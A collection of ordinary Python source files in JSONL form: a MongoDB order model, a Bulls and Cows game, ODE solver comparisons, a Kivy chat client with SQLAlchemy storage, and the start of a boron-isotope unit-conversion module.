{"seq_id":"73323210987","text":"from datetime import datetime, timedelta\n\nfrom bson.objectid import ObjectId\n\nfrom models import db\n\n\nMAX_ORDERID = -1\n\n# projection for unknown page\nUNKNOWN_PROJECT = [\n    {\n        \"$addFields\": {\n            \"_id\": {\"$toString\": \"$_id\"},\n            \"takenAt\": {\n                \"$dateToString\": {\n                    \"format\": \"%Y/%m/%d %H:%M\",\n                    \"date\": \"$takenAt\",\n                }\n            },\n        }\n    },\n    {\"$project\": {\"content\": 1, \"notes\": 1, \"takenAt\": 1}},\n    {\"$project\": {\"content.id\": 0, \"content.category\": 0}},\n]\n\n\ndef find_by_time(start, end):\n    return {\"takenAt\": {\"$gte\": start, \"$lte\": end}, \"state\": \"end\"}\n\n\ndef get_raw_history(start, end):\n    return db.ORDER_COLLECTION.find(\n        find_by_time(start, end),\n        {\n            \"content.id\": 0,\n            \"content.category\": 0,\n            \"_id\": 0,\n            \"takenAt\": 0,\n            \"state\": 0,\n            \"total\": 0,\n            \"userName\": 0,\n        },\n    )\n\n\ndef build_analysis_struct(interval, slot):\n    result = {\n        \"interval\": [],\n        \"itemAnalysis\": {},\n        \"genderAnalysis\": [\n            {\"female\": 0, \"male\": 0, \"total\": 0} for i in range(slot)\n        ],\n    }\n    for i in range(slot):\n        if i == slot - 1:\n            result[\"interval\"].append(\"{}+\".format(i * interval))\n        else:\n            result[\"interval\"].append(\n                \"{}-{}\".format(i * interval, interval * (i + 1) - 1)\n            )\n    return result\n\n\ndef get_analysis_data(start, end):\n    interval = 10\n    slot = 7\n    result = build_analysis_struct(interval, slot)\n    # query\n    raw_data = 
db.ORDER_COLLECTION.aggregate(\n [\n {\"$match\": find_by_time(start, end)},\n {\n \"$lookup\": {\n \"from\": \"user\",\n \"localField\": \"userName\",\n \"foreignField\": \"userName\",\n \"as\": \"user\",\n }\n },\n {\n \"$project\": {\n \"_id\": 0,\n \"content.name\": 1,\n \"content.quantity\": 1,\n \"user.birth\": 1,\n \"user.gender\": 1,\n \"user.userName\": 1,\n \"takenAt\": 1,\n }\n },\n {\n \"$unwind\": {\n \"path\": \"$user\",\n \"preserveNullAndEmptyArrays\": False,\n }\n },\n ]\n )\n # first calc\n for data in raw_data:\n age = (data[\"takenAt\"] - data[\"user\"][\"birth\"]).days // 365\n index = min(age // interval, slot - 1)\n # build gender analysis\n result[\"genderAnalysis\"][index][data[\"user\"][\"gender\"]] += 1\n # build item analysis\n for content in data[\"content\"]:\n if content[\"name\"] not in result[\"itemAnalysis\"]:\n result[\"itemAnalysis\"][content[\"name\"]] = {\n \"female\": [0] * slot,\n \"male\": [0] * slot,\n \"sum\": [0] * slot,\n \"femaleTotal\": 0,\n \"maleTotal\": 0,\n \"total\": 0,\n }\n result[\"itemAnalysis\"][content[\"name\"]][data[\"user\"][\"gender\"]][\n index\n ] += content[\"quantity\"]\n # sum\n for genderAnalysis in result[\"genderAnalysis\"]:\n genderAnalysis[\"total\"] = (\n genderAnalysis[\"female\"] + genderAnalysis[\"male\"]\n )\n for itemAnalysis in result[\"itemAnalysis\"].values():\n itemAnalysis[\"femaleTotal\"] = sum(itemAnalysis[\"female\"])\n itemAnalysis[\"maleTotal\"] = sum(itemAnalysis[\"male\"])\n itemAnalysis[\"sum\"] = [\n itemAnalysis[\"male\"][i] + itemAnalysis[\"female\"][i]\n for i in range(slot)\n ]\n itemAnalysis[\"total\"] = (\n itemAnalysis[\"femaleTotal\"] + itemAnalysis[\"maleTotal\"]\n )\n return result\n\n\ndef get_max_orderid():\n result = list(\n db.ORDER_COLLECTION.aggregate(\n [\n {\"$addFields\": {\"orderID\": {\"$toInt\": \"$orderID\"}}},\n {\"$group\": {\"_id\": None, \"max\": {\"$max\": \"$orderID\"}}},\n ]\n )\n )\n if len(result) == 0:\n return 0\n else:\n return result[0][\"max\"]\n\n\ndef get_not_end_by_username(user_name):\n return db.ORDER_COLLECTION.aggregate(\n [\n {\n \"$match\": {\n \"userName\": user_name,\n \"state\": {\"$nin\": [\"end\"]},\n \"takenAt\": {\"$gte\": datetime.now() - timedelta(days=1)},\n }\n },\n {\n \"$addFields\": {\n \"takenAt\": {\n \"$dateToString\": {\n \"format\": \"%Y/%m/%d %H:%M\",\n \"date\": \"$takenAt\",\n }\n },\n \"_id\": {\"$toString\": \"$_id\"},\n }\n },\n {\n \"$project\": {\n \"createdAt\": 0,\n \"userName\": 0,\n \"total\": 0,\n \"content.id\": 0,\n \"content.type\": 0,\n }\n },\n ]\n )\n\n\ndef add_order(data):\n def build_business_time(time_str):\n result = data[\"takenAt\"][:-6] + \"-\" + time_str\n return datetime.strptime(result, \"%Y-%m-%d-%H:%M\")\n\n # init max orderid\n global MAX_ORDERID\n if MAX_ORDERID == -1:\n MAX_ORDERID = get_max_orderid()\n\n # convert data to correct type\n taken_at = datetime.strptime(data[\"takenAt\"], \"%Y-%m-%dT%H:%M\")\n business_time = list(\n db.BUSINESS_COLLECTION.find_one({}, {\"_id\": 0}).values()\n )\n business_time = business_time[taken_at.isoweekday() - 1]\n start = build_business_time(business_time[\"start\"])\n end = build_business_time(business_time[\"end\"])\n print(datetime.now(), taken_at)\n # check if content is empty, takenAt is > now and in business interval\n if (\n start <= taken_at <= end\n and len(data[\"content\"]) > 0\n and taken_at > datetime.now()\n ):\n MAX_ORDERID += 1\n for meal in data[\"content\"]:\n meal[\"id\"] = ObjectId(meal[\"id\"])\n tar_col = {\n \"item\": db.ITEM_COLLECTION,\n 
\"combo\": db.COMBO_COLLECTION,\n }\n tar = tar_col[meal[\"category\"]].find_one(\n {\"_id\": meal[\"id\"]}, {\"name\": 1}\n )\n meal[\"name\"] = tar[\"name\"]\n\n result = db.ORDER_COLLECTION.insert_one(\n {\n \"userName\": data[\"userName\"],\n \"notes\": data[\"notes\"],\n \"total\": data[\"total\"],\n \"content\": data[\"content\"],\n \"state\": \"unknown\",\n \"createdAt\": datetime.now(),\n \"takenAt\": taken_at,\n \"orderID\": str(MAX_ORDERID),\n }\n )\n\n pipeline = [{\"$match\": {\"_id\": result.inserted_id}}] + UNKNOWN_PROJECT\n return list(db.ORDER_COLLECTION.aggregate(pipeline))[0]\n else:\n return None\n\n\ndef update_state(data):\n state = [\"doing\", \"cancel\", \"finish\", \"end\"]\n if data[\"state\"] in state:\n db.ORDER_COLLECTION.update_one(\n {\"_id\": ObjectId(data[\"id\"])}, {\"$set\": {\"state\": data[\"state\"]}}\n )\n result = db.ORDER_COLLECTION.find_one(\n {\"_id\": ObjectId(data[\"id\"])},\n {\"userName\": 1, \"_id\": 1, \"orderID\": 1, \"state\": 1},\n )\n if result:\n result[\"_id\"] = str(result[\"_id\"])\n return result\n else:\n return None\n else:\n return None\n\n\ndef get_todo_order(id=None):\n if id:\n match = {\n \"$match\": {\n \"state\": {\"$in\": [\"doing\", \"finish\"]},\n \"_id\": ObjectId(id),\n }\n }\n else:\n match = {\"$match\": {\"state\": {\"$in\": [\"doing\", \"finish\"]}}}\n\n result = db.ORDER_COLLECTION.aggregate(\n [\n match,\n {\n \"$lookup\": {\n \"from\": \"user\",\n \"localField\": \"userName\",\n \"foreignField\": \"userName\",\n \"as\": \"user\",\n }\n },\n {\"$unwind\": {\"path\": \"$user\"}},\n {\"$project\": {\"content.id\": 0, \"content.category\": 0}},\n {\n \"$project\": {\n \"_id\": {\"$toString\": \"$_id\"},\n \"orderID\": {\"$toInt\": \"$orderID\"},\n \"takenAt\": {\n \"$dateToString\": {\n \"format\": \"%Y/%m/%d %H:%M\",\n \"date\": \"$takenAt\",\n }\n },\n \"state\": 1,\n \"content\": 1,\n \"notes\": 1,\n \"user_id\": {\"$toString\": \"$user._id\"},\n \"phone\": \"$user.phone\",\n }\n },\n {\"$sort\": {\"orderID\": 1}},\n ]\n )\n return result\n\n\ndef get_unknown_order():\n pipeline = (\n [{\"$match\": {\"state\": \"unknown\"}}]\n + UNKNOWN_PROJECT\n + [{\"$sort\": {\"orderID\": 1}}]\n )\n result = db.ORDER_COLLECTION.aggregate(pipeline)\n return result\n\n\ndef update_food_amount(data):\n result = db.ORDER_COLLECTION.find_one(\n {\"_id\": ObjectId(data[\"id\"])}, {\"content\": 1, \"_id\": 0}\n )\n for meal in result[\"content\"]:\n if meal[\"category\"] == \"item\":\n db.ITEM_COLLECTION.update_one(\n {\"name\": meal[\"name\"]}, {\"$inc\": {\"sell\": meal[\"quantity\"]}}\n )\n if meal[\"category\"] == \"combo\":\n db.COMBO_COLLECTION.update_one(\n {\"name\": meal[\"name\"]}, {\"$inc\": {\"sell\": meal[\"quantity\"]}}\n )\n","repo_name":"creek0810/loveat2","sub_path":"models/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":9844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26639772971","text":"\"\"\"Bull&Cows game.\"\"\"\nimport sys\nimport random\n\nPUZZLE_LENGTH = 4\n\n\ndef make_puzzle():\n \"\"\"Return random string from 4 different digits.\"\"\"\n puzzle = []\n while len(puzzle) < PUZZLE_LENGTH:\n digit = str(random.choice(range(10)))\n if digit not in puzzle: # pragma: no cover\n puzzle.append(digit)\n\n return ''.join(puzzle)\n\n\ndef is_unique_chars(text):\n \"\"\"Return True, if text consist from unique chars.\"\"\"\n for i in range(len(text) - 1):\n if text[i] in text[i + 1:]:\n return False\n\n return True\n\n\ndef 
is_valid(text):\n \"\"\"Return True, if user input follow formal criteria.\"\"\"\n if len(text) != PUZZLE_LENGTH:\n return False\n\n try:\n int(text)\n except ValueError:\n return False\n\n if not is_unique_chars(text):\n return False\n\n return True\n\n\nclass BullCows:\n \"\"\"Bull&Cows quest.\"\"\"\n\n def __init__(self, puzzle=None):\n \"\"\"Can use predefined puzzle.\"\"\"\n self.try_count = 0\n self.puzzle = puzzle\n if self.puzzle is None:\n self.puzzle = make_puzzle()\n\n def check(self, answer):\n \"\"\"Check answer string for cows and bulls.\"\"\"\n if not is_valid(answer):\n return (None, None)\n\n self.try_count += 1\n position, cows, bulls = 0, 0, 0\n for digit in answer:\n if digit in self.puzzle:\n if position == self.puzzle.index(digit):\n bulls += 1\n else:\n cows += 1\n\n position += 1\n\n return (cows, bulls)\n\n\ndef get_input(prompt): # pragma: no cover\n \"\"\"Return user input.\"\"\"\n return input(prompt)\n\n\ndef main(argv, puzzle=None):\n \"\"\"Standalone app.\"\"\"\n quest = BullCows(puzzle=puzzle)\n cows, bulls = None, None\n if (len(argv) > 1) and (argv[1] == 'imcheater'):\n print(\"my puzzle:\", quest.puzzle)\n\n while bulls != PUZZLE_LENGTH:\n cows, bulls = quest.check(get_input('enter 4 digits:'))\n if cows is None:\n print('need {} different digits!'.format(PUZZLE_LENGTH))\n else:\n print('cows:', cows, 'bulls:', bulls)\n\n print('Done!')\n print('Quest solved with {} tries'.format(quest.try_count))\n\n\nif __name__ == \"__main__\": # pragma: no cover\n main(sys.argv)\n","repo_name":"vb64/bulls_cows","sub_path":"source/default/bull_cows.py","file_name":"bull_cows.py","file_ext":"py","file_size_in_byte":2299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23892992547","text":"def func(x, u):\r\n return x ** 2 + u ** 2\r\n\r\ndef euler(n, h, x, y):\r\n y_out = []\r\n for i in range(n):\r\n y += h * func(x, y)\r\n x += h\r\n y_out.append(y)\r\n return y_out\r\n\r\ndef un_euler(n, h, x, y):\r\n y_out = []\r\n for i in range(n):\r\n y += h * (func(x, y) + func(x+h, y + h * func(x, y)))/2\r\n x += h\r\n y_out.append(y)\r\n return y_out\r\n\r\ndef runge_kutta_2(n, h, x, y):\r\n y_out = []\r\n for i in range(n):\r\n y += h * func(x+h/2, y+h/2*func(x,y))\r\n x += h\r\n y_out.append(y)\r\n return y_out\r\n\r\ndef picar(n, h, x):\r\n # Производные для метода Пикара\r\n def f1(a):\r\n return a ** 3 / 3\r\n def f2(a):\r\n return f1(a) + a ** 7 / 63\r\n def f3(a):\r\n return f2(a) + a ** 14 * 2 / 2079 + a ** 15 / 59535\r\n\r\n\r\n y_out = [0]\r\n for i in range(n-1):\r\n x += h\r\n y_out.append(f3(x))\r\n return y_out\r\n \r\n\r\npower = 3\r\nn = 3 * 10 ** power\r\nh = 10 ** -power\r\nx = 0\r\ny0 = 0\r\nx_arr = [x + h*i for i in range(n)]\r\ny1 = euler(n, h, x, y0)\r\ny2 = un_euler(n, h, x, y0)\r\ny3 = runge_kutta_2(n, h, x, y0)\r\ny4 = picar(n, h, x)\r\n\r\nprint(\"| x | Пикара | Явный Эйлера | Неявный Эйлера | Рунге-Кутты 2го порядка|\")\r\nprint(\"-\"*85)\r\nfor i in range(len(y1)):\r\n print(\"|{:.4f} | {:.8f} | {:.8f} | {:.8f} | {:.8f} |\".format(x_arr[i],y4[i],y1[i],y2[i],y3[i]))\r\nprint(\"-\"*76)\r\n\r\n\r\n# сходимость проверяется при фиксированном x \r\n","repo_name":"Ermako27/numerical-methods","sub_path":"sem6/lab1/lab01.py","file_name":"lab01.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10480165661","text":"# Imports\nfrom network import Network\nimport datetime\n\n# Kivy\nfrom 
kivy.clock import Clock\nfrom kivy.uix.screenmanager import Screen, ScreenManager, NoTransition\nfrom kivy.uix.floatlayout import FloatLayout\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.scrollview import ScrollView\nfrom kivy.uix.spinner import Spinner, SpinnerOption\nfrom kivy.uix.button import Button\nfrom kivy.uix.textinput import TextInput\nfrom kivy.uix.label import Label\nfrom kivy.core.window import Window\nfrom kivy.app import App\nfrom kivy.uix.popup import Popup\n\n# SQLAlchemy\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import declarative_base\nfrom sqlalchemy import Column, Integer, String, DateTime, Boolean\nfrom sqlalchemy.orm import sessionmaker\n\nengine = create_engine('sqlite:///database.db', echo=False)\nBase = declarative_base()\nSession = sessionmaker(bind=engine)\nsession = Session()\n\n\nclass Conversations(Base):\n __tablename__ = 'conversations'\n id = Column(Integer, primary_key=True)\n enduser = Column(String)\n user = Column(String)\n ms = Column(String)\n sendreceive = Column(Boolean)\n time = Column(DateTime)\n\n\nclass Contacts(Base):\n __tablename__ = 'contacts'\n id = Column(Integer, primary_key=True)\n user = Column(String)\n\n\nBase.metadata.create_all(engine)\n\n\nclass MyTextInput(TextInput):\n def on_touch_down(self, touch):\n if self.collide_point(*touch.pos) and self.text != \"\" and not self.disabled:\n self.text = \"\"\n return super(MyTextInput, self).on_touch_down(touch)\n\n\nclass SpinnerOptions(SpinnerOption):\n def __init__(self, **kwargs):\n super(SpinnerOptions, self).__init__(**kwargs)\n self.height = button_size\n\n\nclass SpinnerWidget(Spinner):\n def __init__(self, **kwargs):\n super(SpinnerWidget, self).__init__(**kwargs)\n self.option_cls = SpinnerOptions\n\n\ndef update_chat(instance):\n s1 = screen_manager.get_screen(\"conversation\")\n data = network.send(user=False, data=False)\n if data != \"no data\":\n for value, row in data.items():\n data = \"\".join(row)\n save_message(str(value), network.id, data, False)\n\n if screen_manager.current == \"conversation\":\n if s1.contact_user_id == value:\n s1.add_new_row(client_message=False, data=data)\n\n # new messages counter\n if not (screen_manager.current == \"conversation\" and s1.contact_user_id == value):\n s2 = screen_manager.get_screen(\"contacts\")\n updated = False\n for record in s2.button_list:\n if value == record[0].text:\n updated = True\n record[2].text = str(int(record[2].text) + 1)\n\n # adding new contact if it's not in contact list\n if not updated:\n s2.add_new_contact(text=value)\n\n\ndef save_message(end_user, user, message, flag):\n new_record = Conversations(enduser=end_user,\n user=user,\n ms=message,\n sendreceive=flag,\n time=datetime.datetime.now())\n session.add(new_record)\n session.commit()\n\n\nclass MainScreen(Screen):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.float_layout = FloatLayout()\n\n try:\n with open(\"config.txt\", \"r\") as file:\n user_id = file.read().split(\":\")[1]\n except FileNotFoundError:\n user_id = \"*not set*.\"\n\n self.user_id = MyTextInput(text=f\"Your nickname: {user_id}\",\n halign=\"center\",\n size_hint_x=None,\n width=Window.size[0],\n size_hint_y=None,\n height=button_size,\n disabled=True,\n pos_hint={\"x\": 0, \"y\": 1 - button_size/Window.size[1]})\n\n self.float_layout.add_widget(self.user_id)\n\n self.btn_contacts = Button(text=\"Contacts\",\n pos_hint={\"x\": 0.2, \"y\": 0.5},\n size_hint=(0.6, 0.1),\n 
on_press=self.go_to)\n self.float_layout.add_widget(self.btn_contacts)\n\n self.btn_settings = Button(text=\"Settings\",\n pos_hint={\"x\": 0.2, \"y\": 0.3},\n size_hint=(0.6, 0.1),\n on_press=self.go_to)\n self.float_layout.add_widget(self.btn_settings)\n\n self.add_widget(self.float_layout)\n\n def go_to(self, instance):\n if instance == self.btn_settings:\n screen_manager.current = \"settings\"\n elif instance == self.btn_contacts:\n if self.user_id.text != \"Your nickname: *not set*.\" and network.status != \"connected\":\n screen_manager.current = \"contacts\"\n network.id = self.user_id.text.split(\":\")[1].strip()\n network.user_created_status = network.connect()\n Clock.schedule_interval(update_chat, 1)\n\n elif network.status == \"connected\":\n screen_manager.current = \"contacts\"\n\n else:\n btn_close = BoxLayout(orientation=\"horizontal\")\n popup_warning = Popup(title='Please provide correct User ID',\n content=btn_close,\n size_hint=(None, None),\n size=(Window.width, Window.height / 8))\n btn_close.add_widget(Button(text=\"close\", on_press=popup_warning.dismiss))\n popup_warning.open()\n\n\nclass ConversationScreen(Screen):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n Window.bind(on_key_down=self._on_keyboard_down)\n\n self.float_layout = FloatLayout()\n self.body_row_data = []\n self.contact_user_id = \"N/A\"\n self.user_id_con = MyTextInput(text=\"User ID\",\n halign=\"center\",\n size_hint_x=None,\n width=6*Window.size[0]/10,\n disabled=True,\n size_hint_y=None,\n height=button_size,\n pos_hint={\"x\": 0, \"y\": 1 - button_size/Window.size[1]})\n self.float_layout.add_widget(self.user_id_con)\n\n self.btn_contacts = Button(text=\"Contacts\",\n pos_hint={\"x\": 0.6, \"y\": 1 - button_size/Window.size[1]},\n size_hint=(0.25, button_size/Window.size[1]),\n on_press=self.go_to)\n self.float_layout.add_widget(self.btn_contacts)\n\n self.btn_menu = Button(text=\"Menu\",\n pos_hint={\"x\": 0.85, \"y\": 1 - button_size/Window.size[1]},\n size_hint=(0.15, button_size/Window.size[1]),\n on_press=self.go_to)\n self.float_layout.add_widget(self.btn_menu)\n\n self.layout = GridLayout(cols=1, spacing=10, size_hint_y=None)\n self.layout.bind(minimum_height=self.layout.setter('height'))\n\n self.root = ScrollView(size_hint=(1, None),\n size=(Window.width, Window.height - 3 * button_size - 20),\n pos_hint={\"x\": 0, \"y\": (2 * button_size + 10)/Window.size[1]})\n\n self.root.add_widget(self.layout)\n self.float_layout.add_widget(self.root)\n\n self.data_input = MyTextInput(text=\"Type your message here...\",\n halign=\"center\",\n size_hint_x=None,\n width=Window.size[0],\n size_hint_y=None,\n multiline=False,\n height=button_size,\n pos_hint={\"x\": 0, \"y\": button_size/Window.size[1]})\n self.float_layout.add_widget(self.data_input)\n\n self.btn_send = Button(text=\"Send!\",\n pos_hint={\"x\": 0, \"y\": 0},\n size_hint=(1, button_size/Window.size[1]),\n on_press=self.send_data_to_server)\n self.float_layout.add_widget(self.btn_send)\n\n self.add_widget(self.float_layout)\n\n def _on_keyboard_down(self, instance, keyboard, keycode, text, modifiers):\n if self.data_input.focus and keycode == 40:\n self.send_data_to_server()\n\n def send_data_to_server(self, instance=None):\n data_to_send = self.data_input.text\n if data_to_send and data_to_send != \"Type your message here...\":\n receiver_id = self.contact_user_id\n data = network.send(user=receiver_id, data=data_to_send)\n\n if data != \"no data\":\n for sender_id, row in data.items():\n data = \"\".join(row)\n 
save_message(str(sender_id), network.id, data, False)\n if self.contact_user_id == sender_id:\n self.add_new_row(client_message=False, data=data)\n\n self.add_new_row(client_message=True, data=data_to_send)\n save_message(receiver_id, network.id, data_to_send, True)\n self.data_input.text = \"Type your message here...\"\n\n def add_new_row(self, client_message=True, data=None, time=None):\n if not time:\n time = str(datetime.datetime.now()).split(\".\")[0]\n message_data = f\"{time}\\n{data}\"\n\n # TODO: Issue with fixed label's size needs to be resolved.\n if not client_message:\n message_data = Label(text=message_data,\n halign=\"left\",\n size_hint_x=None,\n size_hint_y=None,\n height=2*button_size,\n width=Window.size[0],\n text_size=(Window.size[0], None))\n\n self.layout.add_widget(message_data)\n\n else:\n message_data = Label(text=message_data,\n halign=\"right\",\n size_hint_x=None,\n size_hint_y=None,\n height=2*button_size,\n width=Window.size[0],\n text_size=(Window.size[0], None))\n self.layout.add_widget(message_data)\n\n self.root.scroll_to(message_data)\n\n self.body_row_data.append([message_data])\n\n def go_to(self, instance):\n if instance == self.btn_contacts:\n screen_manager.current = \"contacts\"\n elif instance == self.btn_menu:\n screen_manager.current = \"main\"\n\n def load_conversation(self):\n for row in self.body_row_data.copy():\n for widget in row:\n self.layout.remove_widget(widget)\n self.body_row_data.remove(row)\n for row in session.query(Conversations).\\\n filter(Conversations.user == network.id, Conversations.enduser == self.contact_user_id). \\\n all():\n self.add_new_row(client_message=row.sendreceive, data=row.ms, time=str(row.time).split(\".\")[0])\n\n\nclass ContactsScreen(Screen):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.float_layout = FloatLayout()\n self.update = None\n self.button_list = []\n\n self.btn_menu = Button(text=\"Menu\",\n pos_hint={\"x\": 0.8, \"y\": 1 - button_size/Window.size[1]},\n size_hint=(0.2, button_size/Window.size[1]),\n on_press=self.go_to)\n self.float_layout.add_widget(self.btn_menu)\n\n popup_content = BoxLayout(orientation=\"vertical\")\n label_box_1 = Label(text='User nickname')\n self.text_box_1 = MyTextInput(text='')\n popup_content.add_widget(label_box_1)\n popup_content.add_widget(self.text_box_1)\n self.popup_submit_button = Button(text=\"Submit\", on_press=self.add_new_contact)\n popup_content.add_widget(self.popup_submit_button)\n\n self.popup_new_contact = Popup(title='Add new contact',\n content=popup_content,\n size_hint=(None, None),\n size=(Window.width/1.5, Window.height/3))\n\n self.btn_add_new_contact = Button(text=\"Add new contact\",\n pos_hint={\"x\": 0, \"y\": 1 - button_size/Window.size[1]},\n size_hint=(0.8, button_size/Window.size[1]),\n on_press=self.popup_new_contact.open)\n self.float_layout.add_widget(self.btn_add_new_contact)\n\n self.layout = GridLayout(cols=3, spacing=10, size_hint_y=None)\n self.layout.bind(minimum_height=self.layout.setter('height'))\n\n self.root = ScrollView(size_hint=(1, None),\n size=(Window.width, Window.height - button_size - 10),\n pos_hint={\"x\": 0, \"y\": 0})\n\n self.root.add_widget(self.layout)\n self.float_layout.add_widget(self.root)\n self.add_widget(self.float_layout)\n self.load_contacts()\n\n def go_to(self, instance):\n if instance == self.btn_menu:\n screen_manager.current = \"main\"\n\n def load_contacts(self):\n for record in session.query(Contacts).all():\n self.display_contact(text=record.user)\n\n def 
display_contact(self, text, number=\"0\"):\n contact_button = Button(text=text,\n size_hint_x=None,\n size_hint_y=None,\n height=button_size,\n width=2 * Window.size[0] / 4 - 5,\n on_press=self.open_conversation)\n self.layout.add_widget(contact_button)\n\n count_message = Button(text=number,\n size_hint_x=None,\n size_hint_y=None,\n height=button_size,\n width=Window.size[0] / 4 - 5)\n self.layout.add_widget(count_message)\n\n contact_delete_button = Button(text=\"X\",\n size_hint_x=None,\n size_hint_y=None,\n height=button_size,\n width=Window.size[0] / 4 - 5,\n on_press=self.delete_conversation)\n self.layout.add_widget(contact_delete_button)\n self.button_list.append([contact_button, contact_delete_button, count_message])\n\n def add_new_contact(self, instance=None, text=None):\n\n if instance == self.popup_submit_button:\n text = self.text_box_1.text\n number = \"0\"\n else:\n number = \"1\"\n\n if not session.query(Contacts).filter(Contacts.user == text).all():\n new_contact = Contacts(user=text)\n session.add(new_contact)\n session.commit()\n self.text_box_1.text = \"\"\n self.popup_new_contact.dismiss()\n self.display_contact(text=text, number=number)\n\n def open_conversation(self, instance):\n screen_manager.current = \"conversation\"\n s1 = screen_manager.get_screen(\"conversation\")\n s1.user_id_con.text = f\"Chat with user: {instance.text}\"\n s1.contact_user_id = instance.text\n s1.load_conversation()\n\n # clear unread messages\n for record in self.button_list:\n if instance == record[0]:\n record[2].text = \"0\"\n\n def delete_conversation(self, instance):\n for button in self.button_list:\n if instance == button[1]:\n session.query(Conversations).\\\n filter(Conversations.user == network.id,\n Conversations.enduser == button[0].text).delete(synchronize_session=False)\n session.commit()\n\n session.query(Contacts).filter(Contacts.user == button[0].text).delete(synchronize_session=False)\n session.commit()\n\n self.layout.remove_widget(button[0])\n self.layout.remove_widget(button[1])\n self.layout.remove_widget(button[2])\n self.button_list.remove(button)\n\n\nclass SettingsScreen(Screen):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.float_layout = FloatLayout()\n\n self.go_back_to_menu = Button(text=\"Go back to menu\",\n pos_hint={\"x\": 0, \"y\": 1 - button_size/Window.size[1]},\n size_hint=(1, button_size/Window.size[1]),\n on_press=self.go_to)\n self.float_layout.add_widget(self.go_back_to_menu)\n\n self.user_id = MyTextInput(text=\"User ID\",\n halign=\"center\",\n size_hint_x=None,\n width=Window.size[0],\n size_hint_y=None,\n height=button_size,\n pos_hint={\"x\": 0, \"y\": 0.5 - button_size / Window.size[1]})\n self.float_layout.add_widget(self.user_id)\n\n self.save_user_id = Button(text=\"Save\",\n pos_hint={\"x\": 0, \"y\": 0.5 - 2*button_size/Window.size[1]},\n size_hint=(1, button_size/Window.size[1]),\n on_press=self.save_id)\n self.float_layout.add_widget(self.save_user_id)\n\n self.add_widget(self.float_layout)\n\n def go_to(self, instance):\n if instance == self.go_back_to_menu:\n screen_manager.current = \"main\"\n\n def save_id(self, instance):\n with open(\"config.txt\", \"w\") as file:\n file.write(f\"user_id:{self.user_id.text}\")\n\n s1 = screen_manager.get_screen(\"main\")\n s1.user_id.text = f\"Your nickname: {self.user_id.text}\"\n screen_manager.current = \"main\"\n self.user_id.disabled = True\n\n\nclass MyApp(App):\n def build(self):\n self.title = \"TextComSoc\"\n return screen_manager\n\n\nif __name__ == '__main__':\n 
Window.softinput_mode = \"below_target\"\n Window.size = (300, 700)\n button_size = Window.size[1] / 20\n network = Network()\n\n screen_manager = ScreenManager(transition=NoTransition())\n screen_manager.add_widget(MainScreen(name=\"main\"))\n screen_manager.add_widget(ConversationScreen(name=\"conversation\"))\n screen_manager.add_widget(SettingsScreen(name=\"settings\"))\n screen_manager.add_widget(ContactsScreen(name=\"contacts\"))\n\n MyApp().run()\n","repo_name":"bdrab/TextCommunicator-Socket","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":19298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22009804251","text":"# B isotope fns\n\nimport numpy as np\nfrom cbsyst.helpers import NnotNone, Bunch\nfrom .boron import chiB_calc\n\ndef get_alphaB():\n \"\"\"\n Klochko alpha for B fractionation\n \"\"\"\n return 1.0272\n\ndef get_epsilonB():\n \"\"\"\n Klochko epsilon for B fractionation\n \"\"\"\n return alpha_to_epsilon(get_alphaB())\n\ndef alpha_to_epsilon(alphaB):\n \"\"\"\n Convert alpha to epsilon (which is alpha in delta space)\n\n Parameters\n ----------\n alphaB : array-like\n The isotope fractionation factor for (11/10 BO3)/(11/10 BO4).\n\n Returns\n -------\n array-like\n alphaB expressed in delta notation (AKA epsilonB).\n \"\"\"\n return (alphaB-1)*1000\n\ndef epsilon_to_alpha(epsilonB):\n \"\"\"\n Convert epsilon to alpha\n\n Parameters\n ----------\n epsilonB : array-like\n The isotope fractionation factor (11/10 BO3)/(11/10 BO4) expressed in delta notation.\n\n Returns\n -------\n array-like\n The isotope fractionation factor (11/10 BO3)/(11/10 BO4).\n \"\"\"\n return (epsilonB/1000)+1\n\n\n# Isotope Unit Converters\ndef A11_to_d11(A11, SRM_ratio=4.04367):\n \"\"\"\n Convert fractional abundance (A11) to delta notation (d11).\n\n Parameters\n ----------\n A11 : array-like\n The fractional abundance of 11B: 11B / (11B + 10B).\n SRM_ratio : float, optional\n The 11B/10B of the SRM, by default NIST951 which is 4.04367\n\n Returns\n -------\n array-like\n A11 expressed in delta notation (d11).\n \"\"\"\n return ((A11 / (1 - A11)) / SRM_ratio - 1) * 1000\n\ndef A11_to_R11(A11):\n \"\"\"\n Convert fractional abundance (A11) to isotope ratio (R11).\n\n Parameters\n ----------\n A11 : array-like\n The fractional abundance of 11B: 11B / (11B + 10B).\n\n Returns\n -------\n array-like\n A11 expressed as an isotope ratio (R11).\n \"\"\"\n return A11 / (1 - A11)\n\ndef d11_to_A11(d11, SRM_ratio=4.04367):\n \"\"\"\n Convert delta notation (d11) to fractional abundance (A11).\n\n Parameters\n ----------\n d11 : array-like\n The isotope ratio expressed in delta notation.\n SRM_ratio : float, optional\n The 11B/10B of the SRM, by default NIST951 which is 4.04367\n\n Returns\n -------\n array-like\n Delta notation (d11) expressed as fractional abundance (A11).\n \"\"\"\n return SRM_ratio * (d11 / 1000 + 1) / (SRM_ratio * (d11 / 1000 + 1) + 1)\n\ndef d11_to_R11(d11, SRM_ratio=4.04367):\n \"\"\"\n Convert delta notation (d11) to isotope ratio (R11).\n\n Parameters\n ----------\n d11 : array-like\n The isotope ratio expressed in delta notation.\n SRM_ratio : float, optional\n The 11B/10B of the SRM, by default NIST951 which is 4.04367\n\n Returns\n -------\n array-like\n Delta notation (d11) expressed as isotope ratio (R11).\n \"\"\"\n return (d11 / 1000 + 1) * SRM_ratio\n\ndef R11_to_d11(R11, SRM_ratio=4.04367):\n 